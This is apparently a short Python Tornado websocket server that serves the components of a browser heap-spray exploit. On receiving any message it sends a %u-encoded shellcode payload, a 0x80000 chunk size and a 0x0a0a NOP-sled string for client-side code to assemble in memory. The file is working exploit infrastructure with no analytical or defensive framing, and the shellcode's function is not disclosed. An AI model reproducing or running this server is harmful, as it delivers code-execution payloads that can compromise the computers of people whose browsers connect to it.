import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web

PAYLOAD = "%uc931%ue983%ud9dd%ud9ee%u2474%u5bf4%u7381%u6f13%ub102%u830e%ufceb%uf4e2%uea93%u0ef5%u026f%u4b3a%u8953%u0bcd%u0317%u855e%u1a20%u513a%u034f%u475a%u36e4%u0f3a%u3381%u9771%u86c3%u7a71%uc368%u037b%uc06e%ufa5a%u5654%u0a95%ue71a%u513a%u034b%u685a%u0ee4%u85fa%u1e30%ue5b0%u1ee4%u0f3a%u8b84%u2aed%uc16b%uce80%u890b%u3ef1%uc2ea%u02c9%u42e4%u85bd%u1e1f%u851c%u0a07%u075a%u82e4%u0e01%u026f%u663a%u5d53%uf880%u540f%uf638%uc2ec%u5eca%u7c07%uec69%u6a1c%uf029%u0ce5%uf1e6%u6188%u62d0%u2c0c%u76d4%u020a%u0eb1"
NOPSLED = "%u0a0a%u0a0a"
CHUNK_SIZE = "0x80000"

class WSHandler(tornado.websocket.WebSocketHandler):
	def open(self):
		print("WebSocket opened")

	def on_message(self, message):
		self.write_message( PAYLOAD )
		self.write_message( CHUNK_SIZE )
		self.write_message( NOPSLED )
		self.close()

	def on_close(self):
		print("WebSocket closed")

application = tornado.web.Application([
	(r'/ws', WSHandler),
])
 
if __name__ == "__main__":
	http_server = tornado.httpserver.HTTPServer(application)
	http_server.listen(8888)
	tornado.ioloop.IOLoop.instance().start()
